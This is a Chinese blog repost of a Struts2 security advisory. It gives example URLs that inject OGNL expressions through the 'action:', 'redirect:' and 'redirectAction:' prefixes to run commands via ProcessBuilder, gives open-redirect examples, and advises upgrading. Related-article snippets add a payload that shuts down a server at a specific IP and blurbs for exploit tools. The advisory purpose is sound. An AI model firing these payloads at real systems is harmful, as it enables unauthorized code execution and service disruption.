Struts2重要漏洞

最新推荐文章于 2022-09-27 22:26:11 发布
最新推荐文章于 2022-09-27 22:26:11 发布
阅读量162 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: struts2 文章标签: Struts Apache SSH Java 框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iteye_1760/article/details/82521328

转载: Struts2被曝重要漏洞,波及全系版本




该版本修复的主要安全漏洞如下: 

1.  通过在参数前面加上“action:”/“redirect:”/“redirectAction:”前缀,以实现远程代码执行,如下: 

代码 
  1. http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  
  2.   
  3. http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  
  4.   
  5. http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}  


 


2.  通过在参数前面加上“redirect:”/“redirectAction:”前缀,以实现开放式重定向,如下: 

代码 
  1. http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/  
  2.   
  3. http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23  




详细漏洞信息: 

建议开发者将所有Struts 2应用程序升级至最新版本。 

如果你从其他分支迁移至2.3.x分支,需要注意,该分支最低要求Servlet API 2.4、JSP API 2.0和Java 5。 

下载地址: http://struts.apache.org/
Java代码审计】RCE篇
大河之犬的博客
12-21 1865
命令注入(RCE)是指在某种开发需求中,需要引入对系统本地命令的支持来完成某些特定的功能。当未对可控输入的参数进行严格的过滤时,则有可能发生命令注入。攻击者可以使用命令注入来执行系统终端命令,直接接管服务器的控制权限。
struts-2漏洞
weixin_48776804的博客
07-21 415
struts-2漏洞
struts2 action的安全隐患 上
iteye_824的博客
09-13 219
本文介绍了java开发流行框架struts2以及webwork的一些安全缺陷,并举例说明框架本身以及开发人员使用框架时,所产生的种种安全问题,以及作者挖掘框架安全漏洞的一些心得体会。 推荐以下人群阅读: 了解java开发 了解框架开发 了解web application安全 “网络安全爱好者” 正文: 当前java开发网站,通常不会是纯JSP的,大都使用了java framework...
struts2 代码执行(CVE-2018-11776)漏洞复现 vulfocus夺旗
muhan的博客
04-15 4943
1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址 2、判断是否有漏洞: 使用特定payload拼接url,访问抓包 ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回 3、构造POC,替换掉请求内容 原始poc: ${(#dm=@ognl.OgnlContext@DEFAULT
struts漏洞
{丸の子}
01-05 99
2.240.202.201/sdm/plat/login.action ?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'Shutdown','-s','-t','1'})).start()} ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyM
《网络安全java代码审计实战》笔记1-常见漏洞审计
赵花花08042的博客
11-01 5556
学习笔记↓ sql注入 sql语句参数直接动态拼接 String id=request.getParameter("id"); 预编译有误 开发者的个人习惯,没有按照PrepreStatement正确的 开发方式进行数据库连接查询,再预编译语句中也sql语句拼接 String id="2"; String username="user%' 'or'='1'#"; String sql="SELECT * FROM user where id=?"; sql+="and username like
Struts2漏洞检查工具Struts2.2019.V2.3
01-25
然而,随着时间的推移,Struts2在安全方面暴露出了一些重要的漏洞,这给使用该框架的系统带来了潜在的安全风险。"Struts2漏洞检查工具Struts2.2019.V2.3"是一个专门针对这些漏洞进行检测的工具,旨在帮助开发者和...
全网最全Struts 2 全版本漏洞检测工具,最新struts漏洞更新
04-18
渗透测试是网络安全的重要环节,通过使用这样的工具,不仅可以帮助开发者找出并修复Struts 2中的漏洞,还能提高整体的安全意识,建立更为健壮的安全防御体系。对于企业来说,定期进行这样的安全检查,可以降低被黑客...
Struts2漏洞检查工具2018版.rar
03-31
总的来说,Struts2漏洞检查工具2018版是一个重要的安全资源,它可以帮助维护Struts2应用的安全性,防止可能的恶意攻击。在使用该工具时,应当遵循合法的使用规则,仅用于授权环境下的安全测试,避免触犯法律法规。
Struts2漏洞利用工具2019版 V2.3.zip
09-11
"Struts2漏洞利用工具2019版 V2.3.zip" 是一个针对这些安全漏洞的检测和利用工具,用于帮助安全研究人员和系统管理员识别和修复Struts2框架的安全问题。 首先,Struts2框架的最著名的漏洞之一是S2-045,这是一个...
K8 Struts2 Exp 20160516(Struts2综合漏洞利用工具)
01-07
总的来说,Struts2漏洞是企业信息安全的重要威胁,需要开发者和运维人员时刻保持警惕,通过持续的安全更新和严格的安全策略来降低风险。而“K8 Struts2 Exp 20160516”这样的工具提醒我们,对安全漏洞的利用工具必须...
Struts2漏洞检查工具2017版.zip
07-24
警告: 本工具为漏洞自查工具,请勿非法攻击他人网站! Struts2漏洞检查工具2017版 V2.0 by 安恒信息应急响应中心。支持S2-032,S2-037,S2-016,S2-019,S2-045,S2-046,S2-048漏洞验证。有对漏洞的命令执行功能、文件上传功能。还有批量验证功能。增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。增加S2-048 Struts 2.3.X,支持检查官方示例struts2-showcase应用的代码执行漏洞。增加安恒信息研究员nike.zheng发现的S2-045。jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。
Apache Struts2远程代码执行漏洞(S2-009)
weixin_47493074的博客
09-27 653
Apache Struts2远程代码执行漏洞(S2-009)
CTFshow刷题日记-WEB-JAVA(web279-300)Struts2漏洞复现,Java漏洞复现
热门推荐
Love&Share
10-12 2万+
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件中常数extension的值
Struts2漏洞分析与复现合集
未完成的歌~的博客
08-22 8014
原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/s2-001 运行以下命令进行设置 .............
关于 struts2 远程漏洞的介绍
weixin_33881753的博客
11-26 192
安全宝指出,Struts2被曝存在重大远程任意代码执行安全漏洞,影响Struts2全系版本。而对于此次堪比棱镜事件的危害,众多大型互联网厂商均存在该漏洞,且影响厂商仍在扩大之中。同时漏洞利用代码已经被强化,可直接通过浏览器的提交对服务器进行任意操作并获取敏感内容。目前安全宝用户暂可高枕无忧。同时也建议使用Struts开源架构的网站用户尽快加入安全宝云体系,以保护网站免受漏洞的...
Struts2 漏洞集合
kali_Ma的博客
01-21 7848
Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署 S2-001 (CVE-2007-4556) 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用
Struts-S2-048漏洞测试
黑面狐
09-08 3817
这个是7月份爆出的漏洞了。 可以远程执行代码,想想就很厉害的样子。 一、环境搭建。 tomcat  /  jdk   /Struts-2.3.24-apps.zip tomcat和jdk直接跳过了   包含漏洞环境的安装包下载地址:http://download.youkuaiyun.com/download/qq1124794084/9969407 下载解压完成后,把struts2-showc
渗透知识-Struts2漏洞
Jian Sun_的博客
02-11 4829
Struts2漏洞利用实例 如果存在struts2漏洞的站,administrator权限,但是无法加管理组,内网,shell访问500. 1.struts2 漏洞原理:struts2是一个框架,他在处理action的时候,调用底层的getter/setter来处理http的参数,将每一个http的参数声明为一个ONGL。 2.struts2 漏洞利用: 步骤如下:1>验证漏洞: 证明了存在struts2漏洞2>执行命令: whoami 很大的administrat...
STRUTS2 getClassLoader漏洞深度分析
"STRUTS2的getClassLoader漏洞利用" STRUTS2的getClassLoader漏洞是一个安全问题,涉及到了Java Web框架Struts2的核心组件。该漏洞源于Struts2的Ognl(Object-Graph Navigation Language)表达式语言的处理方式,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值